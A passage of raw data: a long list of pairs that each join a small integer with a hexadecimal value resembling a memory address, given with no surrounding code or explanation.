[0x1c, 0x43d3d0], [0x58, 0x4412b8], [0x3e, 0x43c7a8], [0x3e, 0x43ecc0], [8, 0x441568], [0x4b, 0x442270], [0x74, 0x440b28], [0x72, 0x43a240], [0x40, 0x43e428], [0x31, 0x4428e8], [0x54, 0x43ad40], [4, 0x43b5d0], [0x76, 0x4420c0], [0x34, 0x440658], [0x35, 0x43fb00], [0x62, 0x43d038], [8, 0x442bc8], [0x6e, 0x43e838], [0x43, 0x43d148], [0x29, 0x4393b8], [0x66, 0x439610], [0x20, 0x43b0b0], [0x30, 0x441b78], [0x67, 0x441e98], [0x2f, 0x440ae0], [3, 0x441388], [0x16, 0x43faf0], [0x6a, 0x43fbe0], [0x40, 0x440088], [0x34, 0x43bb20], [0x68, 0x43b088], [0x72, 0x440dc8], [0x18, 0x441390], [0x46, 0x43ea00], [0xb, 0x43e160], [0x25, 0x43d2e8], [0x2a, 0x43efc8], [0x7a, 0x43b408], [0x17, 0x43ff48], [0, 0x43dbf8], [0x71, 0x43fe88], [5, 0x43dc08], [0x27, 0x43fb38], [0x7c, 0x442540], [0x1a, 0x440d48], [8, 0x43bca0], [0x5c, 0x43e270], [0x5b, 0x43b0c8], [0x4a, 0x4416a0], [0x25, 0x43d650], [0x66, 0x4394a0], [0x73, 0x43f050], [5, 0x439260], [0x23, 0x441fc8], [0x4e, 0x43fd58], [0x46, 0x439b98], [0x6a, 0x43a5d0], [0x49, 0x43ed00], [0x4a, 0x43ca08], [0x11, 0x439538], [0x6c, 0x4399c0], [0x51, 0x439d20], [0x2b, 0x43bdf8], [0x15, 0x43b360], [0x7e, 0x43bef8], [0x70, 0x43f2b8], [10, 0x43ed98], [0x79, 0x43d3a8], [0x12, 0x439588], [0xd, 0x440398], [0x69, 0x43ed70], [0x4c, 0x43be40], [0x1c, 0x439b08], [0x11, 0x43eee0], [0x24, 0x43b0b0], [0x1d, 0x43dfc8], [6, 0x43cf70], [0x55, 0x43e020], [0x5d, 0x43d620], [0x45, 0x43dce8], [0x7b, 0x43acd8], [0x3c, 0x442ca0], [0x11, 0x439a38], [0x46, 0x43f5b8], [0x52, 0x43c710], [0x55, 0x4392d0], [0x5d, 0x442b00], [0x4b, 0x43a6b0], [0x11, 0x43c6a0], [0x3d, 0x43efe8], [0x4c, 0x43f0a0], [0x48, 0x440be8], [0x1c, 0x442698], [6, 0x440158], [0x5a, 0x43b2b0], [0x3c, 0x441e50], [0x75, 0x441b48], [0x40, 0x4416e0], [7, 0x440850], [0x11, 0x43d138], [0x35, 0x441ae8], [0x42, 0x4402a0], [10, 0x441710], [0x24, 0x43f5a0], [4, 0x442868], [0x62, 0x4392e0], [0x3b, 0x4405e8], [0x5a, 0x43d318], [0x4e, 0x4408b8], [0x76, 0x43e250], [0x79, 0x43a4d8], [0x69, 0x439cd8], [4, 0x4393f8], [0x5f, 0x43efa0], [0x54, 0x43c590], [0x39, 0x441ef0], [10, 0x43c6a0], [0x3a, 0x442688], [0x39, 0x441128], [0x5d, 0x43c258], [0x3e, 0x43ccd8], [0x30, 0x440808], [0x4e, 0x43aa78], [0x46, 0x43a420], [0x24, 0x43e4d0], [0x69, 0x4420c0], [0x75, 0x43b060], [0x6a, 0x441888], [0x28, 0x43c0b0], [0x23, 0x43cf78], [0x53, 0x43a788], [0x40, 0x43fd60], [0xc, 0x4390b0], [0x52, 0x43f590], [0x3c, 0x439fb8], [0x2a, 0x43dcd0], [0x76, 0x439730], [6, 0x43a318], [0x57, 0x43a7a0], [0x27, 0x43cf00], [0xd, 0x43a060], [0x48, 0x43a5b0], [0x72, 0x439f10], [8, 0x4403e0], [0x4a, 0x43cb70], [0x3c, 0x43de18], [0x3f, 0x442570], [0x59, 0x441f80], [0x61, 0x43eb18], [0x48, 0x43cc78], [0x45, 0x4429d0], [0x60, 0x43e210], [0x48, 0x43d068], [0x69, 0x43e518], [3, 0x442298], [0x3f, 0x442070], [0x5e, 0x4404f0], [0x20, 0x43eb18], [0x7b, 0x43cf18], [0x2a, 0x43cfd8], [0x3b, 0x439e00], [6, 0x43e880], [0x42, 0x43c948], [0x59, 0x43e3d0], [0x11, 0x43ed18], [0x7e, 0x441738], [0x3a, 0x43bba0], [4, 0x43ba58], [0x38, 0x439bd0], [9, 0x43ed40], [0x6c, 0x4424a0], [0x78, 0x43df38], [0x5b, 0x43d430], [0x28, 0x43d440], [7, 0x43d948], [0x66, 0x43bdf8], [0x38, 0x4416d0], [1, 0x43ba38], [0x65, 0x43bb50], [0x41, 0x43e6d8], [0x12, 0x43d7b0], [2, 0x439dd8], [0x62, 0x442778], [0x3b, 0x43dee0], [0x6e, 0x43a9b0], [0x37, 0x43fe58], [0x19, 0x43e7b8], [0x65, 0x440ad8], [0x26, 0x43a6b0], [0x40, 0x442868], [0x6d, 0x43ead8], [0x79, 0x43e2f8], [0x80, 0x43a570], [0x54, 0x439540], [0x22, 0x442948], [0x36, 0x441d98], [0x3d, 0x43a820], [2, 0x43b950], [10, 0x442a90], [0x55, 0x442168], [0x17, 0x43fb98], [0x76, 0x43ce18], [0x6c, 0x43d320], [0x43, 0x43d388], [0x50, 0x43e1e0], [0x71, 0x43b448], [0x76, 0x43c208], [0x4a, 0x43cda0], [0x34, 0x43d950], [0x55, 0x43db90], [0x54, 0x4424f0], [3, 0x441b48], [0x54, 0x43d5a8], [0x5e, 0x440de8], [0x6e, 0x439160], [0x4d, 0x4402b8], [0x15, 0x440578], [0x68, 0x43ce88], [0x3f, 0x43df18], [0x6f, 0x4396c8], [0x51, 0x43a410], [0x68, 0x442c20], [0x4d, 0x43d5d0], [0x62, 0x43e368], [0x32, 0x43d300], [0x7d, 0x43e770], [0x44, 0x43ab08], [0x24, 0x43cf30], [5, 0x441bc8], [0x18, 0x43b2d8], [0x2b, 0x43f578], [0x43, 0x439490], [0x55, 0x440ac8], [0x5c, 0x43f568], [0x47, 0x43a5a0], [0x7a, 0x43b7a0], [8, 0x441478], [0, 0x43a9f8], [5, 0x43b380], [0x76, 0x43e258], [0x2a, 0x43b878], [0x6b, 0x43be98], [0x1c, 0x43c790], [0x34, 0x43a8c8], [0x61, 0x4413c0], [0x5d, 0x441b68], [0x4b, 0x43ff90], [0, 0x4426a8], [0x67, 0x43c178], [0x48, 0x4412b0], [0x27, 0x442678], [0x13, 0x43d010], [0x38, 0x442050], [0x36, 0x43cb90], [0x19, 0x43b1d0], [0x65, 0x43d3b0], [99, 0x43b1b0], [0x68, 0x43cc90], [0x76, 0x439948], [0x7b, 0x43d758], [0x65, 0x43af50], [0, 0x440298], [0x3f, 0x442568], [0x70, 0x442548], [0x3f, 0x43d450], [0x46, 0x43bfe8], [0x6a, 0x441da0], [0x15, 0x43a110], [0x16, 0x440028], [0x34, 0x43dda8], [0x6f, 0x43b880], [0x33, 0x43b568], [2, 0x43f978], [0x6a, 0x441158], [0x4f, 0x43ea70], [0x69, 0x43e2a0], [0x72, 0x43c440], [0x79, 0x4428e0], [0x5b, 0x43c0c0], [0x33, 0x43e7a8], [0x38, 0x43fd58], [0x21, 0x43ef08], [5, 0x441420], [4, 0x43b1a8], [0x36, 0x43b978], [0x45, 0x43e930], [0x53, 0x4396d0], [0xb, 0x442740], [0x5a, 0x43ac58], [9, 0x43ba28], [0xf, 0x43b990], [0x12, 0x441858], [0x53, 0x43bcc0], [0x71, 0x439a08], [0x62, 0x43b298], [5, 0x43b9d0], [0x1c, 0x43d440], [0x42, 0x439798], [0x4b, 0x441328], [7, 0x43f210], [0x15, 0x43aa40], [100, 0x441740], [0x78, 0x439fc0], [0x40, 0x439288], [0x22, 0x43d460], [4, 0x43a340], [0x7e, 0x43e598], [0x36, 0x43fa80], [0x3c, 0x43f7e0], [0x31, 0x43e208], [0x7d, 0x441678], [0x4e, 0x43cbc0], [0x13, 0x43d4d0], [0x40, 0x439510], [2, 0x43c5c8], [0x73, 0x439a50], [0x20, 0x4421c0], [0x31, 0x43be08], [0x7b, 0x43b758], [0x52, 0x43b8e8], [0x7d, 0x43c2c0], [0x44, 0x441bf0], [0x58, 0x440d58], [0x3a, 0x43e1e0], [0x4a, 0x43f490], [0x2b, 0x43f628], [0x3a, 0x43fc90], [0x22, 0x440d30], [0x33, 0x43e090], [0x59, 0x4400f8], [0x56, 0x43f6f0], [0x43, 0x4423e0], [0x20, 0x441478], [0x71, 0x43e2d0], [0x5f, 0x43ff88], [100, 0x439a38], [0x73, 0x43d428], [0x5e, 0x43cf60], [0x39, 0x43b700], [0x2f, 0x440b38], [0x7c, 0x4426a0], [0x7d, 0x4398a0], [0x13, 0x43eba8], [0x37, 0x440c28], [0x7c, 0x43a5f8], [0x72, 0x43ed10], [0x55, 0x43ca30], [0x1b, 0x43ce50], [0x50, 0x43b168], [0x18, 0x442c90], [0x13, 0x43d4d8], [0x43, 0x43eee8], [0x37, 0x442918], [0xb, 0x43e928], [0x26, 0x442520], [0x48, 0x43e780], [0x41, 0x4421c0], [0x6c, 0x441938], [0x65, 0x43fb80], [0x6e, 0x43f860], [0x50, 0x43c840], [0x1b, 0x43a210], [0x7b, 0x43d978], [0x40, 0x43a608], [0x4d, 0x43c5d0], [0x38, 0x43a488], [0x68, 0x440a50], [99, 0x43f6b8], [0x60, 0x43bc58], [0x2d, 0x43f0b0], [0x10, 0x43ffe8], [0x68, 0x43f380], [0x68, 0x4428c0], [0x60, 0x4394b0], [0x79, 0x43e5a0], [0x4f, 0x439fe0], [0x7e, 0x43c4f8], [0x68, 0x43aeb0], [0x2d, 0x43a2d8], [0x2a, 0x43b998], [0x1f, 0x4409f8], [0x14, 0x43c0c8], [0x1a, 0x43cb60], [99, 0x441eb0], [0x70, 0x440c58], [0x4a, 0x43d350], [0x49, 0x43abe8], [0x13, 0x4425f8], [0x2f, 0x43e418], [0x6d, 0x43ab80], [3, 0x441c38], [0xc, 0x43fde0], [0x3a, 0x43b7d8], [0x13, 0x439b98], [0x2e, 0x43e5c8], [0x72, 0x43d740], [0x34, 0x43d0d0], [0x13, 0x43db40], [0x4e, 0x43ba18], [5, 0x43e690], [0x4e, 0x4428a0], [0x17, 0x43e3f8], [0x13, 0x442218], [0x77, 0x43bd60], [0x39, 0x43bc08], [0x50, 0x43f2e8], [0x16, 0x4427d8], [0x7b, 0x43f8a8], [0x22, 0x43bea0], [0x46, 0x43fa98], [0x38, 0x4398c0], [0x5a, 0x43a078], [99, 0x43da20], [0x43, 0x440a30], [0x11, 0x440968], [0x35, 0x43ea90], [0x4f, 0x43cfb8], [0x6d, 0x440a28], [0x11, 0x4406f8], [0x6c, 0x43d278], [0x10, 0x440a10], [0x6e, 0x43c9b0], [0x34, 0x4403f0], [0x21, 0x4392f0], [0x39, 0x441a90], [0x4f, 0x43bb50], [0x5e, 0x43d5d0], [0x4d, 0x441648], [0x6e, 0x439e70], [0x5e, 0x43f860], [0x54, 0x4426e0], [9, 0x43ea78], [0x2a, 0x43a410], [0x4c, 0x43f6e8], [0x52, 0x4411c0], [0x71, 0x439e08], [0x26, 0x43bc30], [0x4e, 0x43b218], [0x46, 0x43d950], [0x23, 0x440d80], [0x6d, 0x43d668], [0x7e, 0x439170], [0x27, 0x43b8f0], [0x5b, 0x43e1a8], [0x78, 0x442730], [0x44, 0x43eb48], [0x76, 0x441470], [0x3d, 0x439ac0], [0x7d, 0x4425f0], [0x5f, 0x43c0f8], [0x4e, 0x43a8c0], [0x2b, 0x43cbd0], [0x59, 0x439728], [0x28, 0x43d658], [0x19, 0x440eb0], [0x51, 0x43d658], [0x15, 0x442a28], [0x6d, 0x43b100], [0x7c, 0x442b20], [0x44, 0x43ed20], [0x15, 0x439430], [0x78, 0x442430], [0x3b, 0x440168], [0x34, 0x43dd30], [0x56, 0x43ac60], [0x76, 0x43afd0], [0x5f, 0x4397f0], [0x68, 0x442b08], [0x69, 0x43d638], [0x55, 0x4416b8], [0x68, 0x43b9d0], [0x27, 0x43d1f0], [0x6b, 0x439910], [0x7d, 0x4403f0], [0x2e, 0x43c0e0], [0x2b, 0x43b348], [0x37, 0x43f668], [0x2e, 0x43aa58], [0x4f, 0x440480], [0x7e, 0x43b380], [0x25, 0x43f418], [0xe, 0x43c3b8], [0x4f, 0x43a018], [0x23, 0x43e378], [5, 0x442b20], [0x5a, 0x43fb78], [0x54, 0x43e1a8], [0x43, 0x43a108], [0x19, 0x43c660], [0x3e, 0x442618], [0x77, 0x440370], [0x4c, 0x43ad50], [0x3f, 0x43c810], [0x3d, 0x43e0f8], [0x44, 0x43c578], [0x4e, 0x43a338], [0x41, 0x440510], [0x45, 0x43a230], [0x4b, 0x43d0a8], [0x73, 0x43d598], [0x3c, 0x43ad60], [0x61, 0x439410], [99, 0x43c188], [0x6f, 0x43bb30], [0x24, 0x43e658], [0x10, 0x43f4a8], [0x7a, 0x440358], [0x2b, 0x440c08], [0x74, 0x43f678], [0x22, 0x43b8d8], [0x18, 0x440c10], [3, 0x43e0d8], [0x6d, 0x43a718], [0x66, 0x43e1e8], [0x67, 0x43a8a8], [0x26, 0x440570], [0xb, 0x43a1b8], [0x40, 0x43f200], [5, 0x43e9a8], [0x1a, 0x43bb58], [9, 0x439678], [0xc, 0x442720], [0x42, 0x43e048], [0x5a, 0x43d390], [5, 0x440358], [9, 0x439cb0], [0x2e, 0x43b2c8], [0x1b, 0x43a2d8], [0x50, 0x441168], [0x61, 0x43aab8], [0x26, 0x439218], [0x26, 0x43cf80], [0x56, 0x43e170], [0x70, 0x441b90], [0x12, 0x439948], [0x5d, 0x441340], [0x22, 0x43aec8], [0x7d, 0x440610], [0x3e, 0x43e748], [0x61, 0x43fbf0], [0xb, 0x43c8f0], [0x3c, 0x43c0c8], [0x52, 0x43eca0], [0x49, 0x43b438], [0x7e, 0x439180], [0x54, 0x43f4d0], [0x67, 0x442440], [0xb, 0x43bd80], [0x65, 0x43f138], [0x16, 0x4429c0], [0x4a, 0x4411b0], [0x79, 0x43f0f0], [0x32, 0x43e178], [0x50, 0x4421a8], [0x4a, 0x43c158], [100, 0x440460], [1, 0x440580], [0x36, 0x441220], [0x39, 0x43ee98], [0x5e, 0x4427c8], [0x6e, 0x43daa0], [0x7b, 0x43d178], [0x7d, 0x440910], [0x14, 0x440830], [0x6e, 0x4404e0], [0x7d, 0x43b948], [0x56, 0x43c4d0], [0x57, 0x43c060], [0x69, 0x442898], [0x19, 0x441328], [0x29, 0x4426c0], [0x3c, 0x43a6a8], [0x52, 0x43c608], [0x17, 0x4422f0], [0x7e, 0x43d8b0], [0x58, 0x43dd30], [0, 0x43eb48], [0x44, 0x4411a8], [0x20, 0x43ec90], [0x27, 0x43ea60], [0xc, 0x441d18], [0x19, 0x440530], [0x46, 0x43d3b0], [6, 0x442818], [0x59, 0x440558], [0x15, 0x440e98], [4, 0x43e270], [0x5e, 0x442040], [0x4b, 0x43ee48], [0x24, 0x4394b8], [0x28, 0x43d6b0], [0x5b, 0x440948], [0x7e, 0x43b6b8], [0x3c, 0x442820], [0x66, 0x43c608], [0x51, 0x4396f8], [0x3e, 0x43e630], [6, 0x440838], [0x14, 0x439650], [0x42, 0x43a8d8], [4, 0x43edc8], [0x2a, 0x43dc70], [0x6b, 0x43c178], [0x71, 0x439630], [0x26, 0x43a000], [100, 0x43b6a0], [0x1e, 0x43d788], [0x35, 0x442240], [0x1c, 0x43ce70], [0x22, 0x43dcb0], [0x5e, 0x43b9f0], [0x4c, 0x43c150], [0x73, 0x440118], [6, 0x43bf10], [0x1a, 0x43b6f8], [0x65, 0x441bd8], [0x4a, 0x440360], [0x66, 0x440178], [0x5c, 0x43a710], [0x3c, 0x43dc78], [0x7c, 0x441970], [0x2e, 0x43c148], [0x38, 0x442c80], [0x57, 0x43d8d8], [0x70, 0x43aef0], [0x54, 0x441a88], [0x70, 0x442ac0], [0x74, 0x439318], [0, 0x43a360], [5, 0x43d210], [0x25, 0x43b318], [0x7e, 0x43eb60], [0x7a, 0x43de18], [0, 0x43d930], [0x37, 0x43c7f0], [0x34, 0x43e390], [0x58, 0x43f4d8], [3, 0x440890], [0x31, 0x43d5e0], [0x61, 0x43b498], [0x7c, 0x43fe80], [0x5b, 0x43b0e8], [0x74, 0x43d388], [0x52, 0x43ca90], [0x1c, 0x43d940], [0x16, 0x43e1a8], [0x65, 0x442838], [0x3c, 0x43b268], [0x4b, 0x43d5c0], [0x53, 0x439cd0], [0x44, 0x43d668], [0x71, 0x43a500], [0x2b, 0x43b400], [0x33, 0x43cd48], [0x2d, 0x43f758], [0x18, 0x43a640], [0x28, 0x43b210], [0x6b, 0x43cb18], [0x2b, 0x441e40], [0x12, 0x441740], [0x68, 0x439678], [0x76, 0x4404e0], [0x71, 0x4391a0], [0x76, 0x43eff8], [0x57, 0x43dcd0], [0x65, 0x43c9e0], [0x39, 0x442cb0], [0x38, 0x43e040], [0x4a, 0x43da98], [0x4d, 0x43ed48], [0x37, 0x43ebb8], [0x67, 0x43e9c8], [0x45, 0x43ebe8], [0x5d, 0x441490], [0x36, 0x442068], [0xd, 0x4391e8], [0x76, 0x43c708], [10, 0x440b70], [0x47, 0x439448], [0x2d, 0x43f010], [0x26, 0x43c388], [0x65, 0x43a118], [0x2f, 0x439f08], [0x73, 0x43cb58], [0x71, 0x43b5e8], [0xb, 0x439180], [0x45, 0x43a230], [0x61, 0x43bd38], [0x10, 0x43ead0], [0x31, 0x4423e0], [0x25, 0x442038], [0x3d, 0x440f80], [0x33, 0x43b930], [0x5a, 0x43b020], [0x54, 0x43e7e8], [0xb, 0x43d568], [0x23, 0x439128], [0x2a, 0x43e000], [0x26, 0x43d4f0], [0x34, 0x439480], [0x4d, 0x43ef38], [0x4b, 0x441d70], [0x33, 0x439e90], [0x46, 0x43e248], [0x24, 0x43bdf8], [0x13, 0x43e470], [0x5e, 0x43b9e0], [0x4c, 0x43f608], [0, 0x43c0b0], [0x1c, 0x439ee8], [0x62, 0x43e610], [0x5e, 0x43c840], [0x21, 0x441d70], [0x2c, 0x43f698], [10, 0x43b768], [0x38, 0x4393c0], [0x67, 0x43f938], [0x16, 0x441820], [0x43, 0x43d410], [0x76, 0x439140], [0xd, 0x43abb0], [0x50, 0x440ed0], [0x70, 0x43f9b8], [0xb, 0x442210], [0x18, 0x43fe48], [0x2b, 0x441850], [0x2f, 0x43a0f8], [0x23, 0x43e5a0], [0x62, 0x43c060], [0x16, 0x441118], [0x2c, 0x43ebb0], [0x5d, 0x43e0d8], [0x3a, 0x43e4f8], [0x1b, 0x43ec90], [0x23, 0x43a2b0], [3, 0x43cbd8], [0x3e, 0x43c728], [0x67, 0x43ec80], [0x72, 0x43d4a0], [0x6b, 0x43d5c0], [0x2f, 0x43a1f8], [0xb, 0x43a810], [0x56, 0x4415e0], [0x74, 0x43e8c8], [7, 0x439b78], [0x32, 0x442540], [0x48, 0x43a488], [0x30, 0x439580], [0x27, 0x43d630], [0x2f, 0x439a38], [100, 0x43bf70], [0x1f, 0x43b3d8], [0xd, 0x43f0b0], [0x77, 0x43d9c0], [0x20, 0x43e4c0], [0xe, 0x43e7f0], [0x51, 0x440900], [100, 0x43b0b0], [100, 0x43a7c8], [0x20, 0x43a330], [0x21, 0x43bb38], [0x78, 0x440318], [0x7c, 0x439bf0], [0x65, 0x43eb78], [0x6e, 0x43bd98], [0x54, 0x4422a0], [9, 0x442a90], [0x26, 0x43eec0], [0x3c, 0x43a340], [0x4a, 0x43a5c8], [0x10, 0x43f5c8], [0x3a, 0x442090], [0x7c, 0x43eca8], [0x10, 0x439a30], [0x45, 0x43ae70], [0x13, 0x43f220], [0x21, 0x43d7a8], [4, 0x442620], [0x57, 0x441ce8], [0x55, 0x43f6d0], [0x45, 0x43d3c0], [0x33, 0x43dfc0], [0x6e, 0x43e9d0], [0x1c, 0x43ef08], [0x73, 0x43c698], [0x54, 0x43a718], [0x40, 0x43aa40], [0x5c, 0x43b0e0], [0x13, 0x439720], [5, 0x441448], [0x53, 0x439458], [0x68, 0x43f450], [100, 0x440138], [0x1e, 0x43ab90], [0x49, 0x442178], [1, 0x43a230], [0x3f, 0x43c7a0], [0x19, 0x441320], [99, 0x43bf30], [0x30, 0x43ed30], [0x47, 0x43a4b8], [0x28, 0x43ecf8], [0x19, 0x43f9a8], [0x10, 0x43fae8], [0x5f, 0x439a70], [0x68, 0x442ab8], [0x4b, 0x4429c0], [0x5e, 0x43e508], [0x35, 0x441578], [0x31, 0x43b630], [0x2b, 0x43b2d0], [0x18, 0x441670], [0x6a, 0x43bcf8], [0x7e, 0x43ad40], [0x1c, 0x43ecf0], [0x34, 0x43e188], [0x2e, 0x43e3a0], [0xd, 0x43c4a8], [100, 0x440fc8], [0xe, 0x4408a8], [0x18, 0x43b960], [7, 0x43a590], [0x5a, 0x43fb28], [0x5f, 0x43bf48], [0x3b, 0x43f3d8], [0x51, 0x43e900], [0x3e, 0x440af8], [0x67, 0x43fff8], [6, 0x43bf08], [2, 0x439358], [0x34, 0x43cb90], [0x25, 0x43b8f8], [9, 0x439c50], [0x6a, 0x442a60], [0x5d, 0x43d110], [0x3d, 0x43a758], [0x54, 0x43c960], [0x53, 0x439480], [0xe, 0x43b890], [0x7b, 0x43b888], [0xd, 0x43d468], [0x41, 0x43c130], [0x31, 0x440f78], [0x6d, 0x43d4e0], [8, 0x43b350], [0x6d, 0x43d7e8], [0x2f, 0x440890], [0x2a, 0x43abd8], [0x21, 0x439a48], [0x54, 0x43b8a8], [0x1d, 0x43fc50], [0x30, 0x43c0c0], [0x19, 0x43e7c0], [0x69, 0x43ff88], [0x5e, 0x43d7f8], [0x6a, 0x43fb10], [0x28, 0x4401d8], [0x62, 0x441498], [0x12, 0x43e740], [0x4b, 0x43ba18], [0x1a, 0x439bd0], [0x2d, 0x4421f8], [0x7b, 0x43bab8], [0xc, 0x439098], [0x28, 0x43ed48], [1, 0x43abb8], [0x2d, 0x43a8b8], [0x1d, 0x43a458], [0x51, 0x43b8f8], [0xb, 0x43d630], [0x2a, 0x442b68], [0xf, 0x440998], [0x6f, 0x439078], [0x43, 0x43be68], [0x5b, 0x43c520], [0x49, 0x441fe8], [0x5c, 0x43ba50], [0x5b, 0x43d148], [0x6c, 0x440b78], [0x43, 0x442538], [0x36, 0x43a0d0], [0x54, 0x43d0d8], [0x79, 0x43a9d8], [0x5d, 0x43dfa8], [0x50, 0x440b40], [0x25, 0x439570], [0x3c, 0x4415d0], [0x6f, 0x441960], [0x34, 0x43d280], [0x19, 0x441a28], [0x6f, 0x43d410], [0x5f, 0x442208], [0x54, 0x43fc00], [0x38, 0x43bf90], [0x3a, 0x43cfd8], [0x68, 0x43bc40], [0x4e, 0x43dce0], [0x55, 0x441540], [0x57, 0x43c7e8], [0x7c, 0x4423a8], [0x4e, 0x43a528], [0x4d, 0x43fbd0], [0x44, 0x43c3c0], [0x3d, 0x4396b8], [0x2a, 0x43ab28], [0x5a, 0x43bf88], [0x1a, 0x442688], [0x24, 0x442af8], [0x73, 0x442be8], [0x29, 0x43d258], [0xf, 0x43efa0], [0x45, 0x439970], [0x55, 0x43f6c0], [0x3a, 0x439378], [10, 0x43c368], [0x28, 0x439e20], [0x72, 0x43d0e8], [0x3b, 0x43abd0], [0x57, 0x439fa8], [0x51, 0x441e90], [0x6a, 0x442b00], [0x45, 0x43ffe8], [0xb, 0x43c3d8], [0x5a, 0x43ed08], [0xe, 0x43f588], [0x3d, 0x439460], [0x72, 0x43bbc0], [0x41, 0x43cd80], [0x22, 0x43ace0], [0x56, 0x43c200], [0x31, 0x43bf10], [0x36, 0x43be50], [0x44, 0x440600], [0x54, 0x43e9a8], [0x76, 0x43a518], [0x2a, 0x439928], [0x7e, 0x43be80], [0x4f, 0x43e468], [0x5d, 0x43c5f8], [0x6f, 0x43ab60], [0x65, 0x43d4e8], [0x2f, 0x43d820], [0x59, 0x439488], [0x72, 0x43c1b8], [0x69, 0x440910], [0x30, 0x43a4d0], [0x5e, 0x43e6b0], [0x25, 0x43bcf0], [0x39, 0x43ceb0], [0x23, 0x43ee60], [0xd, 0x440d80], [0x72, 0x442948], [0x52, 0x43d0a8], [0x35, 0x43a0d8], [0x12, 0x442ae8], [0x72, 0x43bf98], [0x20, 0x439af8], [0x59, 0x43cc18], [0x21, 0x43c1b0], [0x17, 0x43c6d0], [0x4f, 0x43ebc0], [0x6f, 0x43a928], [7, 0x43d580], [0x1a, 0x43a988], [0x2c, 0x439938], [0x5d, 0x43f4f0], [0x68, 0x439ff0], [0x7a, 0x43b170], [0x39, 0x43d578], [0x72, 0x43c330], [0x17, 0x4406e8], [0x1e, 0x43ba20], [0x4b, 0x43c7c8], [0x48, 0x43d5d0], [0xf, 0x43d638], [0x12, 0x442250], [0x59, 0x43d740], [0x66, 0x43d0d8], [10, 0x442280], [0x67, 0x43a9d0], [0x60, 0x43f758], [0x5d, 0x43cce0], [0x40, 0x43f3e0], [0x3a, 0x43c220], [0x73, 0x43ce70], [0x2f, 0x43f5f8], [0x39, 0x43c338], [0x59, 0x4423b8], [0x60, 0x43b590], [0x2b, 0x43ba48], [0x4a, 0x439258], [0x6e, 0x43d5f0], [0x7b, 0x43f940], [0xe, 0x43c588], [0x2c, 0x439bb0], [1, 0x43b6d0], [0, 0x43fe90], [100, 0x43c0b8], [0x35, 0x43f5d0], [0x55, 0x439a80], [0x25, 0x43e098], [0x38, 0x4403b0], [0x36, 0x440718], [0x29, 0x43fba8], [0x3f, 0x43b348], [0x56, 0x441ef8], [0x6a, 0x43e720], [100, 0x43bdb8], [0xd, 0x43c110], [7, 0x440ed0], [0x1c, 0x43ced8], [4, 0x439a00], [0x1c, 0x43a860], [0x66, 0x43d510], [0x50, 0x43b240], [0xf, 0x442478], [0x57, 0x43dc60], [5, 0x43a1d0], [0x2e, 0x4428c8], [0x44, 0x43b430], [0x2c, 0x43cc40], [0x4c, 0x43d068], [0x6b, 0x440d48], [0x4f, 0x43b7a8], [0x4f, 0x43b6e8], [0x1a, 0x43c520], [0x6e, 0x43f528], [0x3a, 0x4428a8], [0x33, 0x43f3d0], [0x6c, 0x439758], [1, 0x43ca30], [0x5b, 0x439130], [5, 0x43a510], [0x2f, 0x4402a0], [0x2a, 0x43abd0], [2, 0x440ac8], [0x56, 0x43c7f0], [0x34, 0x43b410], [0x31, 0x43c150], [0x34, 0x43ecf8], [0x6c, 0x43b548], [0x3e, 0x43f5b8], [0x23, 0x43dc68], [0x12, 0x43dd40], [0x28, 0x43c750], [0x38, 0x43cd38], [0x1e, 0x43c2a0], [0x50, 0x43e168], [8, 0x4412a8], [0, 0x43e318], [0x20, 0x4415a0], [0x65, 0x43dcf8], [0x55, 0x441cd8], [0x5b, 0x43b878], [6, 0x43aab8], [0x3d, 0x43df68], [0x76, 0x43cda8], [8, 0x43a2a0], [0x20, 0x441bd8], [0x1e, 0x43ddd0], [0x43, 0x43f0e8], [0x69, 0x43f378], [0x69, 0x43fad0], [0x31, 0x43eca8], [0x25, 0x43e4b0], [0x62, 0x43d380], [0x67, 0x439100], [0x1d, 0x442838], [0x2b, 0x43b478], [0x3b, 0x442120], [0x5a, 0x43c5d8], [0x41, 0x43f840], [0x62, 0x43de98], [0x3a, 0x441918], [0x32, 0x43a340], [0x22, 0x43c6d8], [0x3b, 0x43f760], [0x4f, 0x43a6d0], [10, 0x441d40], [0x66, 0x43d928], [10, 0x43d2d8], [0x6d, 0x43b2d0], [0x44, 0x43b838], [0x75, 0x440a10], [0x3a, 0x43c710], [0x72, 0x4429c0], [0x1c, 0x442c30], [0x3a, 0x43b380], [0x15, 0x43c890], [0x3d, 0x43b918], [0x10, 0x441150], [1, 0x440b90], [0x27, 0x43db68], [0x5c, 0x43dc88], [0x11, 0x4401b0], [0, 0x43b130], [0x4b, 0x43d930], [0x5e, 0x43b510], [0x5c, 0x439bf8], [0x6e, 0x43de00], [0x55, 0x43ef20], [0x4a, 0x43ca58], [0x7c, 0x43e838], [0x4e, 0x43ba68], [0x57, 0x441b18], [0x24, 0x43b968], [0x59, 0x4424d8], [0x4b, 0x43ec40], [0xc, 0x439fd0], [0x2b, 0x441ad8], [0x74, 0x4403a8], [0x34, 0x43ca40], [0x68, 0x4427e8], [0x1c, 0x43b380], [0x44, 0x442ad0], [0x28, 0x439dc0], [0x30, 0x43a4e8], [0x31, 0x43a670], [0x2c, 0x441aa0], [0x4d, 0x43b830], [0x57, 0x43a3a0], [0x2a, 0x439c00], [0x11, 0x43abc8], [0x37, 0x4390a0], [0x56, 0x43e590], [0, 0x43c248], [0x16, 0x442058], [0x66, 0x43d250], [0x43, 0x43fe90], [0x31, 0x43cb98], [0x79, 0x43dd30], [0x6b, 0x43d410], [0x6d, 0x43e0e8], [0x3e, 0x439f88], [2, 0x43a730], [0x25, 0x43b418], [0x2f, 0x43f930], [0x2e, 0x43afe8], [0x26, 0x43b5b0], [0x22, 0x43f738], [0x58, 0x4427e0], [0x45, 0x442818], [0x3d, 0x43d548], [0x1e, 0x441928], [0x2b, 0x439160], [0x56, 0x441698], [0x58, 0x43b668], [0x30, 0x43d8b8], [0x12, 0x43d9a0], [0x32, 0x440d98], [0x38, 0x43ff18], [0x78, 0x43efe8], [99, 0x43ed48], [0x3a, 0x43b718], [0x72, 0x43df88], [0x13, 0x43a240], [0x4b, 0x43f4d0], [0x10, 0x43a380], [0x1d, 0x43d0c0], [0xd, 0x43f080], [0x52, 0x441a18], [0x67, 0x43b988], [0x2c, 0x43e370], [0xb, 0x439478], [0xd, 0x43a998], [0x73, 0x43d9a8], [0x73, 0x440a28], [9, 0x4405e0], [0x59, 0x43ad68], [1, 0x439398], [0x2e, 0x43add0], [0x39, 0x43e100], [0x54, 0x43cf18], [0x1c, 0x43da80], [0x47, 0x43fb70], [10, 0x43d760], [0x59, 0x43b678], [0x68, 0x43a9e8], [0x2b, 0x4396c8], [0x42, 0x43c6c8], [0x36, 